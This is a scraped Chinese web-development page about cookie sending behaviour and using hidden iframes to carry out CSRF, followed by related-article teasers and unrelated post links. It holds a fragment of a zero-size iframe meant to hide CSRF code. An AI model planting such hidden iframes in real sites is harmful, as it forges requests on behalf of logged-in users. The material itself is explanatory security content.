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" alt="" />

5、另外除了IE浏览器,其他浏览器都可以在<iframe>/<img>/<link>/<script>等标签中发送本地cookie;但是所有浏览器都发送Session Cookie

如何使用iframe实现隐藏的CSRF的更多相关文章

  1. 使用iframe标签隐藏CSRF代码

    index.html <iframe src="1.html" width="0" height="0"></iframe ...

  2. 148.CSRF攻击原理分析、防御、装饰器、中间件、IFrame以及js实现csrf攻击

    CSRF攻击概述: CSRF(Cross Site Request Forgery 跨站域请求伪造)是一种网站攻击的方式,它在2007年曾被列为互联网20大安全隐患之一.其他的安全隐患,比如SQL脚本 ...

  3. crm 4 IFRAME 元素隐藏

    function hidebtn(elementTitle) { var x = document.getElementsByTagName("LI"); for (i = 0; ...

  4. ASP.NET MVC 防止跨站请求伪造(CSRF)攻击的方法

    在HTTP POST请求中,我们多次在View和Controller中看下如下代码: View中调用了Html.AntiForgeryToken(). Controller中的方法添加了[Valida ...

  5. document.referrer之隐藏来源

    document.referrer document.referrer是用来获取跳转链接的来源,正规的解释是:referrer 属性可返回载入当前文档的文档的 URL. 实际中使用在广告相关业务中较多 ...

  6. 使用iframe实现页面无刷新提交表单

    iframe提交表单其实比ajax要方便一些,当然ajax也有ajax的好处,只是ajax编码处理有时有些麻烦,虽然经过转码是可以解决中文问题,但如果直接使用iframe不存这些问题了,下面来看看. ...

  7. Python - Django - CSRF

    CSRF 攻击: 把 settings.py 中的 csrf 注释掉 正规网站: 创建修改密码页面 password.html: <!DOCTYPE html> <html lang ...

  8. 关于使用iframe的父子页面进行简单的相互传值

    当一个页面使用了iframe作为嵌套时,如何想要将父页面的数据传给iframe子页面,那iframe所指向的呢个子页面是怎么获取呢,又或者子页面的数据要给父页面使用,那么父页面又如何获取子页面的数据呢 ...

  9. Laravel 下的伪造跨站请求保护 CSRF#

    简介# Laravel 可以轻松地保护应用程序免受跨站请求伪造(CSRF) 的攻击.跨站请求伪造是一种恶意的攻击, 他凭借已通过身份验证的用户身份来运行未经过授权的命令. Laravel 会自动为每个 ...

随机推荐

  1. Unity C#写的A*寻路

    原地址:http://www.unity蛮牛.com/blog-13769-1078.html 首先看了这篇翻译外国人的文章http://www.raywenderlich.com/zh-hans/2 ...

  2. Log4j配置全说明

    转载:http://zhangjunhd.blog.51cto.com/113473/21014/ 1.Log4j简介 Log4j是Apache的一个开源项目,它允许开发者以任意间隔输出日志信息.Lo ...

  3. loadrunner_analysis技巧_average 和 90% percent

    “90% Percent Time” 表示90%的事务response time 都维持在某个值附近,不是 average response time * 90%;  “Average Time” 平 ...

  4. javaweb学习总结(四十一)——Apache的DBUtils框架学习

    一.commons-dbutils简介 commons-dbutils 是 Apache 组织提供的一个开源 JDBC工具类库,它是对JDBC的简单封装,学习成本极低,并且使用dbutils能极大简化 ...

  5. 第十章Composite设备

    10.1 Composite设备介绍 USB的Composite类是USB 复合设备类,一个USB设备具有多种设备功能,比如一个USB设备同时具有鼠标和键盘功能.单一的USB设备开发相对简单,但在很多 ...

  6. UDP模块(黑胶体)

    UDP模块是采用PIP封装技术的U盘半成品模块,直接加上外壳,就是成品U盘. 它有以下特点: 防水.防尘.防震. 一体WAFER封装技术. 薄.轻.时尚. 产品装配方便.简单. 产品标准化,适合客户在 ...

  7. Python Anaconda2 (64-bit) 安装后启动jupyter-notebook默认目录更改

    看了网上很多关于更改 python notebook的,好麻烦,所以想了一招. python notebook 现在改名叫 jupyter-notebook ,被集成在Anaconda中. Anaco ...

  8. ActionBar官方教程(10)ActionBar的下拉列表模式

    Adding Drop-down Navigation As another mode of navigation (or filtering) for your activity, the acti ...

  9. BZOJ_1005_ [HNOI2008]_明明的烦恼_(组合数学+purfer_sequence+高精度+分解因数+快速幂)

    描述 http://www.lydsy.com/JudgeOnline/problem.php?id=1005 一棵树有n个点,给出没给节点的度,如果没有限制则为-1,求共有多少种可能的树. 分析 蒟 ...

  10. MFC CVIew关闭时崩溃

    记得看视频的时候老师说过    创建CView的时候,也就是创建视图的时候,不要使用  Cview      m_view;这种方式 而是使用Cview  *  pView=new   Cview() ...